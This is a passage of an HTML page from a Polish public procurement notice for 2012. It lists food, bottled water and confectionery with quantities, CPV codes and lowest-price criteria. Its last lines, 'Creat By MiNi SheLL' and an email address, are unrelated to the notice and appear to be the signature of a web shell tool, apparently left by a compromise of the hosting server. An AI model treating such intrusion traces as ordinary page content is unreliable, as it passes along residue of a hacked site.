Ryż biały długoziarnisty - opakowanie-torba papierowa - 1kg, wartość energetyczna w 100g produktu 344kcal	kg.	92,
Soczewica czerwona	    kg	20,
Sok malinowy zagęszczony, pojemność butelki szklanej 420 ml, skład: cukier lub syrop glukozowo - fruktozowy, zagęszczony sok aroniowy 65%  zagęszczony sok wiśniowy (0,25%), syrop bez konserwantów, pasteryzowany.	szt.	17,
Sok owocowy o poj. 0,2 l typu Kubuś	szt.	450,
Sos boloński  - słoik	szt.	41,
Sos słodko-kwaśny typu ŁOWICZ	szt.	42,
Sól kamienna jodowana - op. 1kg	szt.	73,
Szczaw konserwowy opakowanie - słoik 350 g typu Romir	szt.	140,
Tuńczyk w oleju - puszki	szt.	151,
Wafelki	    kg	19,
Woda mineralna niegazowana 1,5 l	szt.	15,
Zioła do drobiu mieszanka rozmarynu, bazylii, majeranku, mięty, tymianku, szałwii, cebuli.	szt.	2,
Żelki	szt.	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> WODA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Woda  natura w butlach o poj. 18,9 l	szt.	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 41.11.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> WYROBY CUKIERNICZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ciasto drożdżowe z kruszonka bez rodzynek	kg	20,
Gwiazdki z marmoladką, świeże	kg	30,
Pączki liliputki ze skórką pomarańczową świeże	kg	50,
Rogaliki z budyniem świeże	kg	60,
Rożki kruche z jabłkiem świeże	kg	60,
Słomka ptysiowa świeża	kg	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com